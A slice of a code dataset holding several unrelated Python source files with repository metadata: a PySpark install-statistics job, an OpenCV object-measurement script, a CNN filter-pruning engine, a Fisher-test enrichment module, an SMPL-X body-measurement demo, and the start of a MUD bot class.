wordlist\n for i in range(10):\n maxExpectation = -inf\n bestChoice = \"\"\n for word in candidates:\n zeroCnt = 0\n expectation = self.expectationOfElemination(candidates, word)\n if expectation > maxExpectation:\n maxExpectation = expectation\n bestChoice = word\n \n matchCnt = master.guess(bestChoice)\n if matchCnt == 6:\n break\n \n newCandidates = []\n for word in candidates:\n if self.matchCount(bestChoice, word) == matchCnt:\n newCandidates.append(word)\n candidates = newCandidates","repo_name":"DingChiLin/AlgorithmSampleCode","sub_path":"Math/GuessTheWord.py","file_name":"GuessTheWord.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"4911604369","text":"# -*- coding: utf-8 -*-\n\nfrom calendar import monthrange\nfrom ConfigParser import RawConfigParser\nfrom pyspark import SparkConf\nfrom pyspark.sql import functions as F\nfrom pyspark.sql import Row, SparkSession\n\nimport argparse\n\ndef retrieveScannedInfo(spark, fr, to):\n\tsql = \"\"\"\n\t\tselect\n\t\t\timei,\n\t\t\tdata_date\n\t\tfrom\n\t\t\tronghui_mart.rh_stat_app_install_all\n\t\twhere\n\t\t\tdata_date between '{0}' and '{1}'\n\t\"\"\".format(fr, to)\n\tprint(sql)\n\tscanned_devices = spark.sql(sql)\n\treturn scanned_devices\n\ndef retrieveActionCounts(spark, to):\n\tsql = \"\"\"\n\t\tselect\n\t\t\timei,\n\t\t\tcnt_app_30d_new,\n\t\t\tcnt_app_30d_delete\n\t\tfrom\n\t\t\tronghui_mart.rh_stat_app_install_30d_all\n\t\twhere\n\t\t\tdata_date = '{0}'\n\t\"\"\".format(to)\n\tprint(sql)\n\taction_counts = spark.sql(sql)\n\treturn action_counts\n\ndef transform_to_row(row_dict):\n\tglobal args\n\trow_dict['data_date'] = args.query_month\n\treturn Row(**row_dict)\n\nif __name__ == '__main__':\n\tprint('====> Initializing Spark APP')\n\tlocalConf = RawConfigParser()\n\tlocalConf.read('../config')\n\tsparkConf = SparkConf()\n\tfor t in localConf.items('spark-config'):\n\t\tsparkConf.set(t[0], t[1])\n\tspark = SparkSession.builder \\\n\t\t\t.appName('RLab_Stats_Report___Cal_Installment_Stats_of_Devices') \\\n\t\t\t.config(conf=sparkConf) \\\n\t\t\t.enableHiveSupport() \\\n\t\t\t.getOrCreate()\n\tsc = spark.sparkContext\n\n\tprint('====> Parsing local arguments')\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('--query_month', type=str)\n\targs = parser.parse_args()\n\tfr = args.query_month+'01'\n\tto = args.query_month+str(monthrange(int(args.query_month[:4]), int(args.query_month[4:]))[1])\n\n\tprint('====> Start calculation')\n\tresult = {}\n\t\n\tscanned_devices = retrieveScannedInfo(spark, fr, to)\n\tscanned_devices_stats = scanned_devices.groupBy(['data_date']).agg(F.count(F.lit(1)).alias('daily_device_count'))\n\tscanned_devices_stats = scanned_devices_stats.select(F.mean('daily_device_count').alias('avg_daily_device_count')).collect()\n\tresult['avg_daily_device_count'] = scanned_devices_stats[0]['avg_daily_device_count']\n\n\taction_counts = retrieveActionCounts(spark, to)\n\taction_count_stats = action_counts.select(\\\n\t\tF.mean('cnt_app_30d_new').alias('avg_installed_app_per_device_30'),\\\n\t\tF.mean('cnt_app_30d_new').alias('avg_uninstalled_app_per_device_30')).collect()\n\tresult['avg_installed_app_per_device_30'] = action_count_stats[0]['avg_installed_app_per_device_30']\n\tresult['avg_uninstalled_app_per_device_30'] = action_count_stats[0]['avg_uninstalled_app_per_device_30']\n\n\tresult = 
sc.parallelize([result]).map(transform_to_row).toDF()\n\tresult.repartition(1).write.csv('/user/ronghui_safe/hgy/rlab_stats_report/installment/device/{0}'.format(args.query_month), header=True)\n","repo_name":"SweeRoty/fintell_app","sub_path":"stats/cal_device_installment_stats_rh.py","file_name":"cal_device_installment_stats_rh.py","file_ext":"py","file_size_in_byte":2665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"21737099857","text":"#!/usr/bin/python3.5\n\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.misc import imshow, imread, imsave\nimport os\nimport sys\nimport optparse\n\ndef edges(image, save, dest_dir, name):\n\n #Canny filter returns binary image with object perimeter in black\n edges = cv2.Canny(image, 9000, 12000, apertureSize = 5)\n\n #Initializes output image with zeros\n edges_rgb = np.zeros(shape=(edges.shape[0], edges.shape[1], 3))\n\n #Makes object perimeter red and remaining image white.\n for i in range(edges.shape[0]):\n for j in range(edges.shape[1]):\n if edges[i][j] == 0:\n edges_rgb[i][j][:] = [255, 255, 255]\n else:\n edges_rgb[i][j][0] = 255\n\n\n if save:\n imsave(os.path.join(dest_dir, name+\"_edge.png\"), edges_rgb)\n else:\n imshow(edges_rgb)\n\n return edges\n\ndef obj_properties(image, save, dest_dir, name):\n area_list = []\n height = image.shape[0]\n width = image.shape[1]\n\n #If user chooses to pass another three channel image, cvtColor will distort it.\n #Verifies image is either RGB or monocromatic\n if image.shape.__len__() == 3 and image.shape[2] == 3:\n gray = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n elif image.shape.__len__() == 2:\n gray = image\n else:\n print(\"Image colorspace has to be either RGB or monocromatic\")\n exit(1)\n\n #Threshold image to binary values then find contours.\n #Canny image makes opencv find two contours for each object.\n thresh, bin_img = cv2.threshold(gray, thresh=250, maxval=255, type=cv2.THRESH_BINARY)\n _, contours, _ = cv2.findContours(bin_img, 1, 2)\n\n\n #Define text properties\n font = cv2.FONT_HERSHEY_COMPLEX\n font_color = (0,0,0)\n thickness = 1\n font_scale = 0\n bottomLeftCornerOfText = (0, 0)\n\n #Ignore any boundary contours. 
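A compact PySpark sketch of the 30-day aggregation computed in the cal_device_installment_stats_rh.py record above, under the same column names; note that it takes the uninstall mean from cnt_app_30d_delete, whereas the record reuses cnt_app_30d_new for both aliases.

from pyspark.sql import SparkSession, functions as F

spark = SparkSession.builder.appName("installment_stats_sketch").getOrCreate()
df = spark.createDataFrame(
    [("imei1", 5, 2), ("imei2", 3, 1)],
    ["imei", "cnt_app_30d_new", "cnt_app_30d_delete"],
)
stats = df.select(
    F.mean("cnt_app_30d_new").alias("avg_installed_app_per_device_30"),
    F.mean("cnt_app_30d_delete").alias("avg_uninstalled_app_per_device_30"),
).collect()[0]
print(stats["avg_installed_app_per_device_30"],
      stats["avg_uninstalled_app_per_device_30"])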
Here we consider no object lies in the boundary of image frame.\n contour_final = []\n for i, cnt in enumerate(contours):\n rect = cv2.boundingRect(cnt)\n if rect[0] > 0 and rect[1] > 0 and rect[1] < width and rect[3] < height:\n contour_final.append(cnt)\n\n #Process output image\n out_img = np.zeros((height, width, 3), dtype=np.uint8)\n for i in range(height):\n for j in range(width):\n if bin_img[i][j] == 0:\n out_img[i][j][:] = [255, 50, 50]\n else:\n out_img[i][j][:] = [255, 255, 255]\n\n\n #Iterate over every contour printing it's region number, perimeter and area.\n print(\"número de regiões: {}\".format(contour_final.__len__()))\n for i, cnt in enumerate(contour_final):\n\n #Find centroid of contour\n M = cv2.moments(cnt)\n cx = M['m10']/M['m00']\n cy = M['m01']/M['m00']\n\n area = cv2.contourArea(cnt)\n perimeter = cv2.arcLength(cnt, closed=True)\n area_list.append(int(area))\n\n #Change fontscale according to contour area\n if area >= 1500: font_scale = 0.7\n else: font_scale = 0.4\n\n text_size, _ = cv2.getTextSize(str(i), font, font_scale, thickness)\n\n tx = text_size[0]/2\n ty = text_size[1]/2\n\n bottomLeftCornerOfText = (int(cx-tx), int(cy+ty))\n\n #Write region number in the center of contour\n cv2.putText(out_img, str(i), bottomLeftCornerOfText, font, font_scale, font_color, thickness)\n\n print(\"região:{:>3} perímetro:{:>4} área:{:>5}\".format(i, int(perimeter), int(area)))\n\n if save:\n imsave(os.path.join(dest_dir, name+\"_objp.png\"), out_img)\n else:\n imshow(out_img)\n\n return out_img, area_list\n\ndef histogram(area_list, save, dest_dir, name):\n\n #Defines bins according to specified intervals:\n # small = [0, 1500)\n # medium = [1500, 3000)\n # maximum = [3000, area_list.max()]\n max_area = np.max(area_list)\n if max_area < 1500:\n bins = [0, 1500]\n elif max_area < 3000:\n bins = [0, 1500, 3000]\n else:\n bins = [0, 1500, 3000, max_area]\n\n #Plots histogram\n plt.hist(area_list, bins=bins, color=\"r\", rwidth=0.5)\n print(bins)\n print(np.diff(bins))\n print(bins[:-1])\n plt.xlabel(\"Área\")\n plt.ylabel(\"Número de Objetos\")\n plt.title(\"Histograma de Área dos Objetos\")\n\n if save:\n plt.savefig(os.path.join(dest_dir, name+\"_hist\"))\n else:\n plt.show()\n plt.close()\n\n return\n\ndef main(filenames, save=False, dest_dir=\"out\"):\n\n for fn in filenames:\n if not os.path.isfile(fn):\n print(\"Image {} doesn't exist.\".format(fn))\n exit(1)\n if fn.split('.')[-1] != \"png\":\n print(\"Invalid image file: {}. Image must be in PNG format.\".format(fn))\n exit(1)\n #Creates directory to save image files\n if save:\n if not os.path.isdir(dest_dir):\n os.mkdir(dest_dir)\n\n for fn in filenames:\n name = fn.split('/')[-1].split('.')[-2]\n img = imread(fn)\n edges(img, save, dest_dir, name)\n _, area_list = obj_properties(img, save, dest_dir, name)\n histogram(area_list, save, dest_dir, name)\n\n\n\n\nif __name__ == \"__main__\":\n parser = optparse.OptionParser()\n parser.add_option(\"-s\", \"--save\",\n action=\"store_true\", dest=\"save\",\n help=\"Save all generated images into DEST_DIR directory. By default this is ./out\")\n\n parser.add_option(\"-d\", \"--dest_dir\",\n action=\"store\", type=\"string\", dest=\"dest_dir\",\n help=\"Directory to place image files. 
If save is False, this option is ignored.\",\n default=\"out\")\n\n options, args = parser.parse_args()\n\n for fn in args:\n if fn.split('.')[-1] != \"png\":\n print(\"Image file argument must be in PNG format.\")\n exit(1)\n \n main(args, options.save, options.dest_dir)\n","repo_name":"prafael18/mc920","sub_path":"t1/object.py","file_name":"object.py","file_ext":"py","file_size_in_byte":5861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"71578106633","text":"import torch\nfrom copy import deepcopy\nfrom .pruning_engine_base import pruning_engine_base\nfrom .Pruning_criterion.L1norm.L1norm import L1norm\nfrom .Pruning_criterion.Taylor.Taylor import Taylor\nfrom .Pruning_criterion.KMean.K_L1norm import K_L1norm\nfrom .Pruning_criterion.KMean.K_Taylor import K_Taylor\nfrom .Pruning_criterion.KMean.K_Distance import K_Distance\n\nclass pruning_engine(pruning_engine_base):\n def __init__(self,pruning_method,pruning_ratio = 0,individual = False,**kwargs):\n \"\"\"\n Initialize the pruning engine.\n\n Args:\n pruning_method: The pruning method to be used.\n pruning_ratio: The pruning ratio to be applied.\n\n Return:\n None\n\n Logic:\n Initialize the pruning engine with the specified pruning method and pruning ratio.\n \"\"\"\n super().__init__(pruning_ratio,pruning_method)\n \n \n if (self.pruning_method == \"L1norm\"):\n self.l1norm_pruning = L1norm()\n self.pruning_criterion = self.l1norm_pruning.L1norm_pruning\n elif (self.pruning_method == \"Taylor\"):\n self.taylor_pruning = Taylor(\n tool_net=kwargs[\"tool_net\"],\n total_layer=kwargs[\"total_layer\"], \n taylor_loader=kwargs[\"taylor_loader\"],\n total_sample_size=kwargs[\"total_sample_size\"], \n hook_function=kwargs[\"hook_function\"])\n self.taylor_pruning.clear_mean_gradient_feature_map()\n self.taylor_pruning.Taylor_add_gradient()\n self.taylor_pruning.store_grad_layer(kwargs[\"layer_store_private_variable\"])\n self.pruning_criterion = self.taylor_pruning.Taylor_pruning\n elif (self.pruning_method == \"K-L1norm\"):\n self.K_L1norm_pruning = K_L1norm(list_k=kwargs[\"list_k\"],pruning_ratio=self.pruning_ratio)\n self.K_L1norm_pruning.store_k_in_layer(kwargs[\"layer_store_private_variable\"])\n \n self.pruning_criterion = self.K_L1norm_pruning.Kmean_L1norm\n elif (self.pruning_method == \"K-Taylor\"):\n \n \n \n self.K_Taylor_pruning = K_Taylor(\n list_k=kwargs[\"list_k\"],\n pruning_ratio=self.pruning_ratio,\n tool_net=kwargs[\"tool_net\"],\n total_layer=kwargs[\"total_layer\"], \n taylor_loader=kwargs[\"taylor_loader\"],\n total_sample_size=kwargs[\"total_sample_size\"], \n hook_function=kwargs[\"hook_function\"],\n layer_store_grad_featuremap=kwargs[\"layer_store_private_variable\"])\n self.K_Taylor_pruning.store_k_in_layer(kwargs[\"layer_store_private_variable\"])\n self.pruning_criterion = self.K_Taylor_pruning.Kmean_Taylor\n\n elif (self.pruning_method == \"K-Distance\"):\n self.K_Distance_Pruning = K_Distance(list_k=kwargs[\"list_k\"],pruning_ratio=self.pruning_ratio)\n self.K_Distance_Pruning.store_k_in_layer(kwargs[\"layer_store_private_variable\"])\n self.pruning_criterion = self.K_Distance_Pruning.Kmean_Distance\n self.remove_filter_idx_history = {\n \"previous_layer\":None,\n \"current_layer\":None\n }\n self.individual = individual\n\n\n def set_layer(self,layer,main_layer=False):\n \"\"\"\n Set the current layer for pruning.\n\n Args:\n layer: The layer to be pruned.\n\n Return:\n None\n\n Logic:\n Set the current layer to the given layer for further 
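A minimal sketch of the contour measurements used in the object.py record above (area, perimeter, and centroid from image moments); it assumes OpenCV 4, whose findContours returns two values rather than the three unpacked in the record.

import cv2
import numpy as np

# synthetic binary image: one filled white square on black
img = np.zeros((100, 100), dtype=np.uint8)
cv2.rectangle(img, (20, 20), (60, 60), 255, thickness=-1)

contours, _ = cv2.findContours(img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
for cnt in contours:
    M = cv2.moments(cnt)
    cx, cy = M["m10"] / M["m00"], M["m01"] / M["m00"]
    print("area:", cv2.contourArea(cnt),
          "perimeter:", cv2.arcLength(cnt, closed=True),
          "centroid:", (round(cx), round(cy)))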
pruning operations.\n \"\"\"\n\n \n \n self.copy_layer = deepcopy(layer)\n \n if main_layer:\n if self.individual:\n self.remove_filter_idx_history = {\n \"previous_layer\":None,\n \"current_layer\":None\n }\n self.remove_filter_idx_history[\"previous_layer\"] = self.remove_filter_idx_history[\"current_layer\"]\n self.remove_filter_idx_history[\"current_layer\"] = None\n remove_filter_idx = self.pruning_criterion(self.copy_layer)\n number_pruning_filter = int(len(remove_filter_idx) * self.pruning_ratio)\n self.remove_filter_idx = remove_filter_idx[number_pruning_filter:]\n if (self.remove_filter_idx_history[\"previous_layer\"] is None):\n self.remove_filter_idx_history[\"previous_layer\"] = self.remove_filter_idx \n self.remove_filter_idx_history[\"current_layer\"] = self.remove_filter_idx\n return True\n \n \n def set_pruning_ratio(self,pruning_ratio):\n \"\"\"\n Set the pruning ratio for the current layer.\n\n Args:\n pruning_ratio: The pruning ratio to be applied to the current layer.\n\n Return:\n None\n\n Logic:\n Set the pruning ratio for the current layer to the specified value.\n \"\"\"\n self.pruning_ratio = 1-pruning_ratio\n if \"K_L1norm_pruning\" in self.__dict__:\n self.K_L1norm_pruning.set_pruning_ratio(1-pruning_ratio)\n if \"K_Distance_Pruning\" in self.__dict__:\n self.K_Distance_Pruning.set_pruning_ratio(1-pruning_ratio)\n if \"K_Taylor_pruning\" in self.__dict__:\n self.K_Taylor_pruning.set_pruning_ratio(1-pruning_ratio)\n\n def get_remove_filter_idx(self):\n \"\"\"\n Get the indices of removed filters.\n\n Args:\n None\n\n Return:\n remove_filter_idx: The indices of filters removed during pruning.\n\n Logic:\n Get the indices of filters that have been removed during the pruning process.\n \"\"\"\n return self.remove_filter_idx_history\n\n def remove_conv_filter_kernel(self):\n \"\"\"\n Remove filters and corresponding kernels from the convolutional layer.\n\n Args:\n None\n\n Return:\n None\n\n Logic:\n Remove filters and corresponding kernels from the current convolutional layer based on the pruning ratio.\n \"\"\"\n\n if self.copy_layer.bias is not None:\n self.copy_layer.weight.data,self.copy_layer.bias.data = self.base_remove_filter_by_index(weight=self.copy_layer.weight.data.clone(),remove_filter_idx=self.remove_filter_idx_history[\"current_layer\"],bias=self.copy_layer.bias.data.clone())\n self.copy_layer.weight.data = self.base_remove_kernel_by_index(weight=self.copy_layer.weight.data.clone(), remove_filter_idx=self.remove_filter_idx_history[\"previous_layer\"])\n self.copy_layer.out_channels = self.copy_layer.weight.shape[0]\n self.copy_layer.in_channels = self.copy_layer.weight.shape[1]\n else:\n self.copy_layer.weight.data = self.base_remove_filter_by_index(weight=self.copy_layer.weight.data.clone(),remove_filter_idx=self.remove_filter_idx_history[\"current_layer\"])\n self.copy_layer.weight.data = self.base_remove_kernel_by_index(weight=self.copy_layer.weight.data.clone(), remove_filter_idx=self.remove_filter_idx_history[\"previous_layer\"])\n self.copy_layer.out_channels = self.copy_layer.weight.shape[0]\n self.copy_layer.in_channels = self.copy_layer.weight.shape[1]\n \n return self.copy_layer\n \n def remove_Bn(self,remove_filter_idx):\n \"\"\"\n Remove filters from the Batch Normalization layer.\n\n Args:\n None\n\n Return:\n None\n\n Logic:\n Remove filters from the Batch Normalization layer based on the pruning ratio.\n \"\"\" \n self.copy_layer.weight.data,\\\n self.copy_layer.bias.data,\\\n self.copy_layer.running_mean.data,\\\n 
self.copy_layer.running_var.data = self.base_remove_filter_by_index(\n self.copy_layer.weight.data.clone(), \n remove_filter_idx,\n bias=self.copy_layer.bias.data.clone(),\n mean=self.copy_layer.running_mean.data.clone(),\n var=self.copy_layer.running_var.data.clone()\n )\n self.copy_layer.num_features = self.copy_layer.weight.shape[0]\n return self.copy_layer\n \n def remove_filter_by_index(self,remove_filter_idx,linear=False,group=False):\n \"\"\"\n Remove filters from the current layer based on the given indices.\n\n Args:\n idx: Indices of filters to be removed.\n\n Return:\n None\n\n Logic:\n Remove filters from the current layer based on the given indices.\n \"\"\"\n if self.copy_layer.bias is not None:\n\n self.copy_layer.weight.data,\\\n self.copy_layer.bias.data = self.base_remove_filter_by_index(\n weight=self.copy_layer.weight.data.clone(),\n remove_filter_idx=remove_filter_idx,\n bias=self.copy_layer.bias.data.clone(),\n linear=linear\n )\n else:\n self.copy_layer.weight.data = self.base_remove_filter_by_index(\n weight=self.copy_layer.weight.data.clone(),\n remove_filter_idx=remove_filter_idx,\n linear=linear\n )\n if linear:\n self.copy_layer.out_features = self.copy_layer.weight.shape[0]\n else:\n self.copy_layer.out_channels = self.copy_layer.weight.shape[0]\n \n if group:\n self.copy_layer.groups = self.copy_layer.weight.shape[0]\n self.copy_layer.in_channels = self.copy_layer.weight.shape[1]\n self.copy_layer.out_channels = self.copy_layer.weight.shape[0]\n return self.copy_layer\n\n def remove_kernel_by_index(self,remove_filter_idx,linear=False):\n \"\"\"\n Remove kernels from the current layer based on the given indices.\n\n Args:\n idx: Indices of kernels to be removed.\n\n Return:\n None\n\n Logic:\n Remove kernels from the current layer based on the given indices.\n \"\"\"\n self.copy_layer.weight.data = self.base_remove_kernel_by_index(\n weight=self.copy_layer.weight.data.clone(),\n remove_filter_idx=remove_filter_idx,\n linear=linear\n \n )\n if linear:\n self.copy_layer.in_features = self.copy_layer.weight.shape[1]\n else:\n self.copy_layer.in_channels = self.copy_layer.weight.shape[1]\n\n return self.copy_layer","repo_name":"MIC-Laboratory/CNN-Pruning-Engine","sub_path":"Pruning_engine/pruning_engine.py","file_name":"pruning_engine.py","file_ext":"py","file_size_in_byte":10389,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"8270303318","text":"#!/usr/bin/env python3\n\nimport pandas as pd\nimport numpy as np\nfrom scipy.special import loggamma\n\n\ndef log_binom(n,k):\n \"\"\"Numerical stable binomial coeffient\"\"\"\n n1 = loggamma(n+1)\n d1 = loggamma(k+1)\n d2 = loggamma(n-k + 1)\n return n1 - d1 -d2\n\ndef fex(target_set : list,\n query_set : list,\n full_set : list,\n alpha = 0.05,\n ):\n \"\"\"Fischer Exact test\"\"\"\n \n ts = set(target_set)\n qs = set(query_set)\n fs = set(full_set)\n \n qs_and_ts = qs.intersection(ts)\n qs_not_ts = qs.difference(ts)\n ts_not_qs = fs.difference(qs).intersection(ts)\n not_ts_not_qs = fs.difference(qs).difference(ts)\n \n x = np.zeros((2,2))\n x[0,0] = len(qs_and_ts)\n x[0,1] = len(qs_not_ts)\n x[1,0] = len(ts_not_qs)\n x[1,1] = len(not_ts_not_qs)\n \n p1 = log_binom(x[0,:].sum(), x[0,0])\n p2 = log_binom(x[1,:].sum(),x[1,0])\n p3 = log_binom(x.sum(), x[:,0].sum())\n \n p = np.exp( p1 + p2 - p3)\n \n return p\n\n\ndef select_set_full(datum,\n names,\n target_set\n ):\n \"\"\"select smallest subset with full coverage\n \n Selects the smallest ranked\n subset of 
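A standalone sketch of the L1-norm criterion behind the pruning_engine.py record above: convolution filters are ranked by the L1 norm of their weights and only the strongest fraction is kept (plain PyTorch, not the repository's engine API).

import torch

conv = torch.nn.Conv2d(in_channels=3, out_channels=8, kernel_size=3)
# one score per output filter: sum of |w| over (in_channels, kH, kW)
scores = conv.weight.detach().abs().sum(dim=(1, 2, 3))
keep_ratio = 0.5
n_keep = int(conv.out_channels * keep_ratio)
keep_idx = torch.argsort(scores, descending=True)[:n_keep]
pruned_weight = conv.weight.detach()[keep_idx]
print(sorted(keep_idx.tolist()), tuple(pruned_weight.shape))  # 4 filters kept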
genes within a\n spot which contains all of the genes of \n interest\n \n \n \"\"\"\n \n sidx = np.fliplr(np.argsort(datum,axis = 1)).astype(int)\n set_list = list()\n for spot in range(sidx.shape[0]):\n snames = [names[x] for x in sidx[spot,:]]\n fidx = [k for k,x in enumerate(snames) if x in target_set]\n fidx = np.max(fidx)\n set_list.append(snames[0:(fidx +1)])\n \n return set_list\n\n\n\ndef select_set_cumsum(datum,\n names,\n mass_proportion = 0.95):\n \n \"\"\"select top genes in set\n \n Selects the top G genes which constitutes\n thrs fraction of the totatl observed counts\n \n \"\"\"\n \n if len(datum.shape) != 2:\n reshape = True\n datum = datum.reshape(1,-1)\n else:\n reshape = False\n \n sidx = np.fliplr(np.argsort(datum,axis = 1)).astype(int)\n cumsum = np.cumsum(np.take_along_axis(datum,sidx,axis=1),\n axis = 1)\n \n \n lim = np.max(cumsum,axis = 1) * mass_proportion\n lim = lim.reshape(-1,1)\n \n q = np.argmin(cumsum <= lim,axis = 1)\n set_list = [names[sidx[x,0:q[x]]].tolist() for x \\\n in range(datum.shape[0])]\n \n if reshape:\n datum = datum.reshape(-1,)\n \n return set_list\n\ndef sampleValues(x,\n n_samples,\n n_genes):\n\n if len(x.shape) < 2:\n reshape = True\n shape = x.shape\n x = x.reshape(1,-1)\n else:\n reshape = False\n\n vals = np.zeros((x.shape[0],n_samples))\n for samp in range(n_samples):\n genes = np.floor(np.random.random(n_genes) * x.shape[1]).astype(int)\n vals[:,samp] = x[:,genes].sum(axis = 1)\n\n if reshape:\n x = x.reshape(shape)\n vals = vals.reshape(-1,)\n\n return vals\n\n\ndef enrichment_score_sampling(cnt : pd.DataFrame,\n target_set : list,\n mass_proportion,\n ):\n \"\"\"\n Bases enrichment score on comparision to \n multiple sampled set of genes. Attractive but\n unfeasible\n \n \"\"\"\n \n inter = cnt.columns.intersection(pd.Index(target_set))\n n_targets = len(target_set)\n nsamples = 100000\n \n # compute sum of target set for all spots\n selscore = cnt.loc[:,inter].values.sum(axis=1).reshape(-1,1)\n \n svals = sampleValues(x = cnt.values,\n n_genes = n_targets,\n n_samples = nsamples,\n )\n \n \n pvals = (selscore < svals).sum(axis=1) /nsamples\n pvals[pvals == 0] = pvals[pvals != 0].min()\n \n return -np.log(pvals).reshape(-1,)\n \n \ndef enrichment_score_fischer(cnt : pd.DataFrame,\n target_set : list,\n mass_proportion : float,\n ):\n \n \"\"\"Compute enrichment score\n \n computes the enrichment score for all\n samples (rows) based on a target_set.\n \n \"\"\"\n \n pvals = []\n query_all = cnt.columns.values\n query_top_list = select_set_cumsum(cnt.values,\n query_all,\n mass_proportion = mass_proportion,\n )\n \n n_in_set = len(set(target_set).intersection(set(query_all)))\n print(f'{n_in_set} / {len(target_set)} of target genes present in data')\n \n full_set = query_all.tolist() + target_set\n print(f'full-set cardinality {len(set(full_set))}')\n print(f'target-set cardinality {len(set(target_set))}')\n \n for ii in range(len(query_top_list)):\n p = fex(target_set,query_top_list[ii], full_set)\n pvals.append(p)\n \n pvals = np.array(pvals)\n \n return -np.log(pvals)\n","repo_name":"almaan/STDGE","sub_path":"enrich.py","file_name":"enrich.py","file_ext":"py","file_size_in_byte":4968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"11508606093","text":"import sys\nimport os\nimport os.path as osp\n\nos.environ['PYOPENGL_PLATFORM'] = 'egl'\n\nfrom threadpoolctl import threadpool_limits\nfrom tqdm import tqdm\nimport torch\nimport argparse\nimport trimesh\nfrom loguru 
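The log-gamma identity in the enrich.py record above keeps binomial coefficients finite for large n; a minimal check of that identity against math.comb (scipy assumed available, as in the record):

import math
from scipy.special import loggamma

def log_binom(n, k):
    # log C(n, k) computed via log-gamma, stable for large arguments
    return loggamma(n + 1) - loggamma(k + 1) - loggamma(n - k + 1)

print(math.isclose(math.exp(log_binom(10, 3)), math.comb(10, 3)))  # True
print(log_binom(100000, 500))  # finite where C(n, k) itself overflows a float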
import logger\nimport numpy as np\nimport smplx\nfrom body_measurements import BodyMeasurements\nfrom attributes.utils.renderer import Renderer\nimport matplotlib.pyplot as plt\nfrom PIL import ImageDraw, ImageFont\n\n\n@torch.no_grad()\ndef main(\n demo_input_folder: os.PathLike = 'demo_input',\n demo_output_folder: os.PathLike = 'demo_output',\n meas_definition_path: os.PathLike = '',\n meas_vertices_path: os.PathLike = '',\n smpl_model_path: os.PathLike = 'data/body_models/smpl',\n gender: str = 'neutral',\n num_betas: int = 10,\n render: bool = True,\n) -> None:\n\n device = torch.device('cuda')\n if not torch.cuda.is_available():\n logger.error('CUDA is not available!')\n sys.exit(3)\n\n os.makedirs(demo_output_folder, exist_ok=True)\n\n npz_files = sorted(os.listdir(demo_input_folder))\n npz_files = [x for x in npz_files if x.endswith('npz')]\n\n body_measurements = BodyMeasurements(\n {'meas_definition_path': meas_definition_path,\n 'meas_vertices_path': meas_vertices_path},\n ).to(device)\n\n smpl= smplx.create(\n model_path=smpl_model_path,\n gender=gender,\n num_betas=num_betas,\n model_type='smplx'\n ).to(device)\n\n if render:\n renderer = Renderer(\n is_registration=False\n )\n\n for npz_file in npz_files:\n print(f'Processing: {npz_file}')\n\n # read betas\n data = np.load(osp.join(demo_input_folder, npz_file))\n betas = torch.from_numpy(data['betas']).to(device).unsqueeze(0)\n\n # smpl function & shaped body\n body = smpl(betas=betas)\n shaped_vertices = body['v_shaped']\n shaped_triangles = shaped_vertices[:,smpl.faces_tensor]\n\n # Compute the measurements on the body\n measurements = body_measurements(\n shaped_triangles)['measurements']\n \n # render shaped body\n if render:\n pred_mesh = trimesh.Trimesh(shaped_vertices.cpu().numpy()[0], smpl.faces)\n pred_img = renderer.render(pred_mesh)\n \n\n # print result\n mmts_str = ' Virtual measurements: '\n for k, v in measurements.items():\n value = v['tensor'].item()\n unit = 'kg' if k == 'mass' else 'm'\n mmts_str += f' {k}: {value:.2f} {unit}'\n print(mmts_str)\n\n # add measurements to image and save image\n if render:\n font = ImageFont.truetype(\"../samples/OpenSans-Regular.ttf\", size=24)\n ImageDraw.Draw(pred_img).text(\n (0, 10), mmts_str, (0, 0, 0), font=font\n )\n pred_img.save(osp.join(demo_output_folder, npz_file.replace('npz', 'png')))\n\n\nif __name__ == '__main__':\n # torch.multiprocessing.set_start_method('fork')\n torch.backends.cudnn.benchmark = True\n torch.backends.cudnn.deterministic = False\n\n arg_formatter = argparse.ArgumentDefaultsHelpFormatter\n description = 'PyTorch SMPL-X Regressor Demo'\n parser = argparse.ArgumentParser(formatter_class=arg_formatter,\n description=description)\n\n parser.add_argument('--output-folder', dest='output_folder',\n default='demo_output', type=str,\n help='The folder where the demo renderings will be saved')\n parser.add_argument('--input-folder', dest='input_folder',\n default='demo_input', type=str,\n help='The folder where the demo npz files are stored')\n parser.add_argument('--meas_definition_path', dest='meas_definition_path',\n default='../data/utility_files/measurements/measurement_defitions.yaml', \n type=str, help='Path to measurement definitions')\n parser.add_argument('--meas_vertices_path', dest='meas_vertices_path',\n default='../data/utility_files/measurements/smplx_measurements.yaml', type=str,\n help='Path to measurement vertices')\n parser.add_argument('--smpl_model_path', dest='smpl_model_path',\n default='../data/body_models', type=str,\n 
help='Path to smpl model folder')\n parser.add_argument('--num_betas', dest='num_betas',\n default=10, type=int,\n help='number of betas smpl model uses')\n parser.add_argument('--gender', dest='gender',\n default='neutral', type=str,\n help='gender of smpl model')\n \n\n args = parser.parse_args()\n\n main( \n demo_input_folder=args.input_folder,\n demo_output_folder=args.output_folder, \n meas_definition_path=args.meas_definition_path,\n meas_vertices_path=args.meas_vertices_path,\n smpl_model_path=args.smpl_model_path,\n gender=args.gender,\n num_betas=args.num_betas\n )","repo_name":"muelea/shapy","sub_path":"measurements/virtual_measurements.py","file_name":"virtual_measurements.py","file_ext":"py","file_size_in_byte":5101,"program_lang":"python","lang":"en","doc_type":"code","stars":265,"dataset":"github-code","pt":"27"} +{"seq_id":"24470067131","text":"\n# import statistics as stats # python 3.4\nimport math\n\nfrom reactions.BotReactions import BotReactionWithFlag\nimport comm.RegexStore as R\nfrom misc_functions import magentaprint\nfrom reactions.referencing_list import ReferencingList\n\nclass Mobs(BotReactionWithFlag):\n# class Mobs(BotReactionWithFlag, ReferencingList):\n # I will give this object MONSTER_LIST because that provides a place for possible extended functionality\n # in the future, such as correcting targets.\n\n # The main reason for this object is too further clean up MudReaderThread, which is ALMOST readable/maintainable now.\n regex_cart = [\n R.mob_arrived, R.mob_died, R.mob_fled, R.mob_defeated, R.mob_wandered, R.mob_left,\n R.mob_joined1, R.mob_joined2, 